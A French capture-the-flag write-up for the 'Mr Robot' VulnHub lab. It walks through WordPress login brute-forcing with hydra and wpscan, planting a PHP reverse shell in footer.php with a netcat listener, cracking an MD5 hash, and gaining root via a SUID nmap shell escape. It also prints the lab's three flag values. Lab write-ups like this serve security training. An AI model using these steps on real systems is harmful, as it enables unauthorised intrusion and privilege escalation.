**Mr Robot - Write Up**
__Reconnaissance__
nmap -sS -A 192.168.43.193
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
__Exploitation Web__
Sur le port 80 :
{{ :vm:web1.png?nolink&600 |}}
Dans le fichier : http://192.168.43.193/readme.html
On peut lire : WordPress version 4.3.9
Un Phpmyadmin est aussi disponible sur le site mais uniquement accessible en local.
Dans le fichier robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
Dans le fichier key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
On récupère le fichier **fsocity.dic** qui est un dictionnaire de mot de passe.
La page [[http://192.168.43.193/wp-login.php]] nous permet de nous authentifié sur le back office de wordpress.
Après quelques tentatives de nom d'utilisateurs on en trouve un valide :
{{ :vm:wp-admin.png?nolink&400 |}}
On bruteforce l'authentification du wp-login avec le dictionnaire trouvé précédemment :
hydra -l elliot -P fsocity.dic 192.168.43.193 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location"
ou encore :
./wpscan.rb --url 192.168.43.87 --wordlist /home/ark1nar/vulnhub/mr_robot/fsocity.dic --username elliot
{{ :vm:wp-login.png?nolink |}}
On se connecte avec les identifiants.
On va ensuite mettre en place notre reverse shell dans le footer.php
{{ :vm:footer.png?nolink |}}
[[http://pentestmonkey.net/tools/web-shells/php-reverse-shell | reverse shell php]]
On ouvre un netcat en écoute sur notre machine :
nc -lvp 1234
Pour déclencher notre reverse shell il faut aller sur n'importe qu'elle page qui contient le fichier footer.php.
Par exemple :
[[http://192.168.43.193/toto.php]]
{{ :vm:nc_mr.png?nolink |}}
Pour obtenir le pty :
python -c 'import pty;pty.spawn("/bin/bash")'
__Exploitation système && Élévation de privilège__
On identifie la version du noyau linux et celle du système :
daemon@linux:/home/robot$ uname -a
uname -a
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
daemon@linux:/home/robot$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.2 LTS
Release: 14.04
Codename: trusty
Dans le /home/robot/
un fichier : password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
On casse le hash sur [[https://crackstation.net]]
{{ :vm:crackstation.png?nolink |}}
On peut se connecter avec l'utilisateur et le mot de passe trouvé précédemment.
{{ :vm:su_robot.png?nolink |}}
On affiche la deuxième clé :
robot@linux:~$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
On cherche tous les exécutables que l'on peut exécuter et qui ont des droits root :
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
Nous allons exploiter : **/usr/local/bin/nmap**
nmap --interactive
nmap> !sh
nmap> id
=> root
{{ :vm:root_mr.png?nolink |}}
On affiche la troisième clé :
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Merci à l'auteur de la machine.